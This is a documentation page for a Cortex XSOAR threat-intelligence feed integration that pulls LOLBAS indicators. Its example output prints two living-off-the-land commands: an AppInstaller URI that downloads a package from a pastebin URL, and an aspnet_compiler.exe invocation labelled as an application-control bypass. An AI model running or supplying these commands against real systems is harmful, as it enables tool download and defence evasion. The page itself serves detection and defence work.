Skip to main content

LOLBAS Feed

This Integration is part of the LOLBAS Feed Pack.#

Supported versions

Supported Cortex XSOAR versions: 6.8.0 and later.

This integration was integrated and tested with version v1 of LOLBAS.

Configure LOLBAS Feed in Cortex#

ParameterDescriptionRequired
Base URLTrue
Fetch indicatorsFalse
Indicator ReputationIndicators from this integration instance will be marked with this reputation.False
Source ReliabilityReliability of the source providing the intelligence data.True
Traffic Light Protocol ColorThe Traffic Light Protocol (TLP) designation to apply to indicators fetched from the feed.False
Bypass exclusion listWhen selected, the exclusion list is ignored for indicators from this feed. This means that if an indicator from this feed is on the exclusion list, the indicator might still be added to the system.False
Use system proxy settingsFalse
Trust any certificate (not secure)False
TagsSupports CSV values.False
Create relationshipsFalse
Feed Fetch IntervalFalse

Commands#

You can execute these commands from the CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

lolbas-get-indicators#

Retrieves a limited number of indicators.

Base Command#

lolbas-get-indicators

Input#

Argument NameDescriptionRequired
limitThe maximum number of indicators to return.Required

Context Output#

PathTypeDescription
LOLBAS.Indicators.Commands.categoryStringThe category of the command.
LOLBAS.Indicators.Commands.commandStringThe command.
LOLBAS.Indicators.Commands.descriptionStringThe description of the command.
LOLBAS.Indicators.Commands.mitreidStringThe MITRE ID related to the command.
LOLBAS.Indicators.Commands.operatingsystemStringThe operating system the command ran on.
LOLBAS.Indicators.Commands.privilegesStringThe privileges required to run the command.
LOLBAS.Indicators.Commands.usecaseStringThe use case of the command.
LOLBAS.Indicators.DescriptionStringThe description of the indicator.
LOLBAS.Indicators.Detections.contentStringThe content of the detection.
LOLBAS.Indicators.Detections.typeStringThe type of the detection.
LOLBAS.Indicators.NameStringThe name of the indicator.
LOLBAS.Indicators.Paths.pathStringThe path of the indicator.
LOLBAS.Indicators.TypeStringThe type of the indicator.
LOLBAS.Indicators.URLStringThe URL to the indicator.

Command example#

!lolbas-get-indicators limit=2

Context Example#

{
"LOLBAS": {
"Indicators": [
{
"Commands": [
{
"category": "Download",
"command": "start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw",
"description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\<RANDOM-8-CHAR-DIRECTORY>",
"mitreid": "Ingress Tool Transfer",
"operatingsystem": "Windows 10, Windows 11",
"privileges": "User",
"usecase": "Download file from Internet"
}
],
"Description": "Tool used for installation of AppX/MSIX applications on Windows 10",
"Detections": [
{
"content": "https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml",
"type": "Sigma"
}
],
"Name": "AppInstaller.exe",
"Paths": [
{
"path": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"
}
],
"Type": "Tool",
"URL": "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"
},
{
"Commands": [
{
"category": "AWL Bypass",
"command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u",
"description": "Execute C# code with the Build Provider and proper folder structure in place.",
"mitreid": "Trusted Developer Utilities Proxy Execution",
"operatingsystem": "Windows 10, Windows 11",
"privileges": "User",
"usecase": "Execute proxied payload with Microsoft signed binary to bypass application control solutions"
}
],
"Description": "ASP.NET Compilation Tool",
"Detections": [
{
"content": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
"type": "BlockRule"
},
{
"content": "https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml",
"type": "Sigma"
}
],
"Name": "Aspnet_Compiler.exe",
"Paths": [
{
"path": "c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"
},
{
"path": "c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"
}
],
"Type": "Tool",
"URL": "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"
}
]
}
}

Human Readable Output#

LOLBAS indicators#

NameDescription
AppInstaller.exeTool used for installation of AppX/MSIX applications on Windows 10
Aspnet_Compiler.exeASP.NET Compilation Tool
Edit this page
Report an Issue